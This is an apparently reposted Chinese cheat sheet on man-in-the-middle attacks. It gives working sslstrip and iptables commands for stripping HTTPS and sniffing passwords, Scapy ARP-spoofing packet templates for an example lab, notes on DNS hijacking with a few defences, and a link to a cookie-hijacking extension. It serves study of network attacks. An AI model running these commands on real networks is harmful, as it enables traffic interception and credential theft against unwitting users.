中间人攻击 - 攻防

穿精又带淫゛_ 提交于 2019-11-26 15:55:21

SSL

检查外网网站是否安装SSL协议以及SSV版本    wosign.ssllabs.com
    
SSL密码嗅探    sslstrip    "# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sslstrip -l 10000"

DNS劫持

目的    钓鱼/广告植入/DOS        
        
防御        
准备备用域名/手动修改DNS/手动修改路由器密码        

ARP欺骗

原理    IP->被攻击者IP mac->攻击者mac / 使局域网中指定的/全部 目标机器数据包-通过攻击者主机转发                            
                                
类型-多数情况下都是同时使用                                
主机型                                
网关型                                
                                
                                
目的    数据监听/敏感信息获取/重放攻击/篡改/钓鱼/结合DNS欺骗进一步渗透                            
                                
Kali/攻击    ip:192.168.1.102/ MAC:00:0c:29:6e:98:a6                            
Windows/目标    IP:192.168.1.18                            
Getway    IP:192.168.1.1                            
"pkt = Ether(src=[1.102的MAC], dst=[1.18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1.18MAC, pdst=1.18IP地址, op=2) 或者
pkt = Ether(src=[1.102的MAC], dst=[1. 18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1. 18MAC, pdst=1. 18IP地址, op=1)"    1. 18发往网关的数据包都会被发往1.102。                            
"pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC,pdst=网关IP地址, op=2)
或者pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC, pdst=网关IP地址, op=1)"    网关发往1.18的数据包都发送到Kali Linux(1.102)上                            
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2)    广播欺骗                            
                                
drifnet    欺骗成功后利用工具/FILTER和REPLACE数据构造                            

 

Cookie劫持

Cookie-Injecting-Tools    谷歌扩展工具/https://github.com/lfzark/cookie-injecting-tools

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!